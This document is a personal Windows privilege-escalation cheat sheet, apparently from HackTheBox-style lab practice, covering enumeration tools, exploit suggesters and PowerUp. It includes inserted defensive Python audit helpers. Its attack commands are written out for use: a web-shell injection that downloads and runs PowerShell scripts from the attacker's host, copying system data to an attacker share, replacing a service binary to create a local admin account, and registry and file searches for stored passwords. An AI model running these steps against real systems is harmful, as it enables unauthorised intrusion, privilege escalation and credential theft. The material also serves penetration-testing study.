2 Enums


Last updated 2 years ago


Enumeration:

  1. Check your username, privileges and groups:

    1. whoami

    2. whoami /priv

    3. net user <yourname>

  2. winPEAS (fast, searchfast, cmd)

  3. Seatbelt and other scripts

  4. If the scripts fail, run the checks manually

  5. Other Win PrivEsc cheatsheets:

    1. --Windows Enums

systeminfo                ..OS build, Proc:x64, OS:x86 - Suggester
hostname
whoami /priv              ..for Token Impersonation (Potato Exploits)
net users
net user Administrator
cmdkey /list              ..look for saved passwords

systeminfo

  • Find kernel exploits by feeding the systeminfo output to WES

  • Kernel exploits can crash the system

  • Find matching exploits: google, exploitdb, github

cd C:/Windows/Temp
> systeminfo > sys.txt
> copy sys.txt \\10.x.x.x\share\ .

Hotfixes listed as N/A?
Confirm here:
dir C:\Windows\SoftwareDistribution\Download    ..prep from wsus
type C:\Windows\WindowsUpdate.log               ..actual update logs

google

whoami
hostname
systeminfo   .. OS, Version, Hotfixes

google: "windows server 2008 6.1.7600 N/A Build 7600 privilege Escalation"
google: "windows 7 enterprise 6.1.7600 priv esc vulnerabilities"

found: 
github/abatchy17/WindowsExploits > 
MS11-046.exe, MS10-059.exe     ..failed
Github/Re4son/chimichurri.exe  ..worked (arctic-htb)
and
MS11-046 (AFD PrivEsc)         ..develHTB

Tasklist

tasklist /V

Windows Exploit Suggester

  • Lots of findings.. just have to look through them!

windows-exploit-suggester.py --database 2019-08-27-mssb.xls --systeminfo sys.txt

WES

curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
python3 wes.py --update 
python wes.py /share/systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more
python wes.py ./sys.txt -s critical -i "Remote Code Execution"

WESng

  • Based on win-ver and patch level

> curl -k "https://raw.githubusercontent.com/bitsadmin/wesng/master/wes.py" > ./wes.py
> python3 wes.py --update 
> python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only
> python ./wes.py ~/htb/arctic/systeminfo.txt -i 'Elevation of Privilege' --exploits-only  

Kernel Exploits

  • Compare to 'systeminfo' report

Check Perms

accesschk.exe /accepteula -wvu "C:\Program Files\Autorun Program\program.exe" 
accesschk.exe /accepteula -quv user CleanUp.ps1

User whoami privs

Privileges give you special rights.

whoami /priv

Note: if a privilege is listed, you have it, even when its state says 'Disabled'.

  • SeBackupPrivilege: grants read access to ALL objects; could find sensitive files/hashes/registry

  • SeRestorePrivilege: grants write to all objects; overwrite binaries/dlls/registry

  • SeTakeOwnershipPrivilege: can take ownership and then write; overwrite binaries/dlls/registry

  • Advanced: SeTcbPrivilege, SeCreateTokenPrivilege, SeLoadDriverPrivilege, SeDebugPrivilege (used in getsystem)
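As an added example (not from the original notes), a small Python parser for `whoami /priv` output that reports the high-risk privileges listed above without filtering on the State column, since a 'Disabled' privilege is still held; the sample output below is constructed, not captured from a real host.

```python
import re

# Privileges these notes single out as high-risk (the list above plus the two
# from the "More..." section). SeTakeOwnershipPrivilege is the canonical name.
HIGH_RISK = {
    "SeBackupPrivilege": "read any file/registry key regardless of ACL",
    "SeRestorePrivilege": "write any file/registry key regardless of ACL",
    "SeTakeOwnershipPrivilege": "take ownership, then grant yourself write",
    "SeImpersonatePrivilege": "impersonate clients (Potato-style abuse)",
    "SeAssignPrimaryTokenPrivilege": "assign a token to a new process",
    "SeTcbPrivilege": "act as part of the OS",
    "SeCreateTokenPrivilege": "create arbitrary tokens",
    "SeLoadDriverPrivilege": "load kernel drivers",
    "SeDebugPrivilege": "open any process (used by getsystem)",
}

# Constructed sample of `whoami /priv` output (not from a real host).
SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Disabled
SeBackupPrivilege             Back up files and directories             Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Enabled
"""

def parse_privs(text):
    """Return {privilege_name: state} from `whoami /priv` output."""
    privs = {}
    for line in text.splitlines():
        m = re.match(r"^(Se\w+Privilege)\s+.*?\s+(Enabled|Disabled)\s*$", line)
        if m:
            privs[m.group(1)] = m.group(2)
    return privs

def high_risk_privs(text):
    """Held high-risk privileges as (name, state, why). The state is reported
    but deliberately not used as a filter: 'Disabled' only means the token has
    not enabled it yet, the holder can still turn it on."""
    return sorted((name, state, HIGH_RISK[name])
                  for name, state in parse_privs(text).items() if name in HIGH_RISK)

if __name__ == "__main__":
    for name, state, why in high_risk_privs(SAMPLE):
        print(f"{name:32} {state:9} {why}")
```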

Windows Service Configuration Viewer

  • Check for misconfigured services that can lead to privilege escalation.

  • If the service binary is writable by low-privileged users, the executable can be replaced and Windows will run whatever it contains as the privileged service account.

icacls scsiaccess.exe

scsiaccess.exe
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)
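Added example (not part of these notes): a Python checker that parses an icacls listing like the one above and flags binaries that a low-privileged principal can write, which is the misconfiguration an auditor wants to catch before it is abused. The listing is reconstructed from the page's scsiaccess.exe example; one ACE per line is assumed (live icacls prints the first ACE on the same line as the path).

```python
import re

# Constructed icacls listing modelled on the page's scsiaccess.exe example.
SAMPLE = """\
scsiaccess.exe
NT AUTHORITY\\SYSTEM:(I)(F)
BUILTIN\\Administrators:(I)(F)
BUILTIN\\Users:(I)(RX)
APPLICATION PACKAGE AUTHORITY\\ALL APPLICATION PACKAGES:(I)(RX)
Everyone:(I)(F)
"""

# Principals every local user effectively belongs to.
LOW_PRIV = {"Everyone", "BUILTIN\\Users", "NT AUTHORITY\\Authenticated Users",
            "NT AUTHORITY\\INTERACTIVE"}
# Simple and granular icacls rights that allow rewriting or replacing the file.
WRITE_RIGHTS = {"F", "M", "W", "WD", "AD", "WDAC", "WO"}

def parse_icacls(text):
    """Return {path: [(principal, {rights})]} from an icacls listing
    (assumption: path on its own line, one ACE per following line)."""
    acls, path = {}, "<unknown>"
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if ":(" not in line:          # a line without an ACE names the file
            path = line
            acls.setdefault(path, [])
            continue
        principal, _, flags = line.rpartition(":")
        groups = re.findall(r"\(([^)]*)\)", flags)
        # Composite entries such as (RX,W) list several rights in one pair of parens.
        rights = {r for grp in groups for r in grp.split(",")}
        acls.setdefault(path, []).append((principal, rights))
    return acls

def weak_binaries(text):
    """Paths a low-privileged principal can write, with the offending ACEs."""
    findings = {}
    for path, aces in parse_icacls(text).items():
        bad = [(p, sorted(r & WRITE_RIGHTS)) for p, r in aces
               if p in LOW_PRIV and r & WRITE_RIGHTS]
        if bad:
            findings[path] = bad
    return findings

if __name__ == "__main__":
    for path, aces in weak_binaries(SAMPLE).items():
        print(path, "is writable by", ", ".join(f"{p} {r}" for p, r in aces))
```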

Watson

  • .NET tool that finds missing patches

  • Check the target's .NET version and build Watson for that version in Visual Studio

> reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
.NET v3.5
Build > Your version: OSx86

\\10.10.14.34\share\Watson.exe
Watson Found 5 Vulns
Including: MS11-046

Sherlock

locate Sherlock.ps1
cp Sherlock.ps1 .
dos2unix Sherlock.ps1  ..fixed some bad unicode (at beginning)
vim Sherlock.ps1
Find-AllVulns          ..add as last line

http://10.x.x.x/ippsec.php?fexec=
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/Sherlock.ps1')|powershell -noprofile -

Found: 
MS15-051 ClientCopyImage not-vulnerable (but ippsec disagrees, try this)
MS16-016 WebDAV ..requires 2 processors and a race condition ..let's ignore

UACME

  • Tries 30+ ways to PrivEsc

  • "You AC Me Bro"

UAC Bypass

  • User Account Control

  • Metasploit has 'bypassuac' for Windows7

  • PowerShell Empire that prompts in a nice way

BeRoot

  • Check for misconfigs in Win or Linux

  • C:\Tools\beRoot.exe

  • Found lots of vulns for PrivEsc

PowerUp Scan

  • PowerShell script to find and exploit PrivEsc vulns

  • PowerShell > PowerShellEmpire > PowerUp.ps1

locate PowerUp.ps1  (empire)
cp PowerUp.ps1 .
vim PowerUp.ps1     ..add 'Invoke-AllChecks' as the last line
python -m SimpleHTTPServer

Send to Victim (ex: Drupal)
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

Found a few 'writable directories' for oracle, but nothing great
ex: c:\oracle\ora90\bin
netstat -an     ..3306 mysql, but not oracle (1521)

PowerUp Abuse

  • Abuse functions ..

    • Write-UserAddMSI

    • Write-ServiceBinary .. Will create user 'john' with password123 as admin!

locate PowerUp.ps1
cp PowerUp.ps1 .
python -m SimpleHTTPServer        ..Share

Send the file to victim           ..example from Drupal
http://10.x.x.x/ippsec.php?fexec=systeminfo
=echo IES(New-Object Net.WebClient).DownloadString('http://$MyIP:8000/PowerUp.ps1')|powershell -noprofile -

PS> Import-Module .\PowerUp.ps1   ..run as Admin if you can
PS> Invoke-AllChecks              ..Scan

----------------------------------
Found: Unquoted Path:
C:\Program Files\VideoStream\1337 Log\Checklog.exe

Exploit:
Will create a new user 'john' with Password 123! and Local Admin!
(after a reboot/service restart)
PS> Write-ServiceBinary -ServiceName 'Video Stream' -ServicePath "C:\Program Files\VideoStream\1337.exe"
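Added example (not PowerUp's code): a Python audit helper that, for an unquoted service ImagePath like the one found above, lists the executables CreateProcess would try before the real one and the directories whose ACLs therefore need checking with icacls/accesschk. It assumes the ImagePath holds only the path, with no trailing service arguments.

```python
import ntpath

# The unquoted path from the PowerUp finding above.
FOUND = r"C:\Program Files\VideoStream\1337 Log\Checklog.exe"

def unquoted_path_candidates(image_path):
    """Executables CreateProcess tries, in order, for an unquoted path with
    spaces: each prefix ending before a space comes first (with .exe appended
    when it has no extension), and the intended binary is tried last.
    Returns [] for a quoted path or a path without spaces (nothing to split)."""
    if image_path.startswith('"') or " " not in image_path:
        return []
    cands = []
    idx = image_path.find(" ")
    while idx != -1:
        prefix = image_path[:idx]
        cands.append(prefix if prefix.lower().endswith(".exe") else prefix + ".exe")
        idx = image_path.find(" ", idx + 1)
    cands.append(image_path)
    return cands

def dirs_to_audit(image_path):
    """Directories where a lower-priority candidate could be planted; if a
    non-admin can write to any of them the service is exploitable, so check
    each with icacls or accesschk -wvu."""
    return sorted({ntpath.dirname(c) for c in unquoted_path_candidates(image_path)[:-1]})

def is_safe(image_path):
    """True when the path is quoted or has no spaces, i.e. no alternate lookups."""
    return not unquoted_path_candidates(image_path)

if __name__ == "__main__":
    for cand in unquoted_path_candidates(FOUND):
        print("lookup:", cand)
    for d in dirs_to_audit(FOUND):
        print("audit ACL on:", d)
```

The fix is to quote the path in the service configuration (sc config <name> binPath= "\"C:\Program Files\...\Checklog.exe\""), after which is_safe returns True.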

SharpUp

win ps or cmd: 
> SharpUp.exe

Seatbelt

Enumeration, but doesn't hunt for privesc

Seatbelt.exe ...help 
Seatbelt.exe all 
Seatbelt.exe NonstandardServices

winPEAS

Hunts for privesc and highlights findings. Most powerful tool in this course, and the most maintained.

Enable cmd colors: reg add HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1

If you can't get colors, try running it from Kali over the reverse shell

cd C:\PrivEsc
winPEASany.exe -h 
winPEASany.exe                   .. default: all 
winPEASany.exe userinfo
winPEASany.exe quiet procesinfo  .. (yes, misspelled)

accesschk

Older but trustworthy tool to check ACLs: what access a user/group has to a file, directory, service or registry key. Downside: sometimes a GUI EULA popup (older versions don't show it; /accepteula suppresses it).

Quick-Paste-Report

  • Copy/Paste into your remote Windows shell to generate a quick report:

@echo --------- BASIC WINDOWS RECON --------- > report.txt
timeout 1
net config Workstation >> report.txt
timeout 1
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" >> report.txt
timeout 1
hostname >> report.txt
timeout 1
net users >> report.txt
timeout 1
ipconfig /all >> report.txt
timeout 1
route print >> report.txt
timeout 1
arp -A >> report.txt
timeout 1
netstat -ano >> report.txt
timeout 1
netsh firewall show state >> report.txt
timeout 1
netsh firewall show config >> report.txt
timeout 1
schtasks /query /fo LIST /v >> report.txt
timeout 1
tasklist /SVC >> report.txt
timeout 1
net start >> report.txt
timeout 1
DRIVERQUERY >> report.txt
timeout 1
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated >> report.txt
timeout 1
dir /s *pass* == *cred* == *vnc* == *.config* >> report.txt
timeout 1
findstr /si password *.xml *.ini *.txt >> report.txt
timeout 1
reg query HKLM /f password /t REG_SZ /s >> report.txt
timeout 1
reg query HKCU /f password /t REG_SZ /s >> report.txt
timeout 1
dir "C:\" >> report.txt
timeout 1
dir "C:\Program Files\" >> report.txt
timeout 1
dir "C:\Program Files (x86)\" >> report.txt
timeout 1
dir "C:\Users\" >> report.txt
timeout 1
dir "C:\Users\Public\" >> report.txt
timeout 1
echo REPORT COMPLETE!

Problems

Enums failing?
couldn't get Watson or winPEAS.exe to work

.NET might be OLD

Example: 'Granny' had v1.0 .NET


> dir C:\Windows\Microsoft.NET\Framework
> reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\NET Framework Setup\NDP"


Consider trying:
Older version of Watson
https://github.com/rasta-mouse/Watson/tree/486ff207270e4f4cadc94ddebfce1121ae7b5437

---------------------------------
---------------------------------
Use the .bat instead!

C:\Temp>winPEAS.bat
winPEAS.bat

Nothing happened?
Prefixing it with cmd /k worked. 
If you check cmd /?, the /k switch Carries out the command specified by string but remains. 
I suspect cmd /c would work as well but never tried that. 


C:\WINDOWS\Temp\Temp>cmd /k winPEAS.bat > output.txt
cmd /k winPEAS.bat > output.txt

Parsing Mof File: C:\WINDOWS\system32\wbem\Cli.mof(Phase Error - 3)
Compiler returned error 0x80041001
etc...
Ok results, but not great...

More...

MS10-059 =

..for recent Windows

USE:

SeImpersonatePrivilege: allows impersonation. Ex:

SeAssignPrimaryTokenPrivilege: similar; enables the user to assign an access token to a new process. Ex:

Example from

SharpUp - good if you don't have PowerShell. C# compiled version:

GhostPack/Seatbelt ... Seatbelt.exe

carlospolop winPEAS

TransferFiles
http://www.fuzzysecurity.com/tutorials/16.html
https://github.com/SecWiki/windows-kernel-exploits
https://github.com/bitsadmin/wesng
https://github.com/rasta-mouse/Watson
WinKernelExploits
https://github.com/hfiref0x/UACME
https://github.com/PowerShellEmpire/PowerTools/blob/master/PowerUp/PowerUp.ps1
https://github.com/GhostPack/SharpUp
https://github.com/r3motecontrol/Ghostpack-CompiledBinaries
https://github.com/GhostPack/Seatbelt
https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS
Juicy Potato
DrupalPhpVuln
chimichurri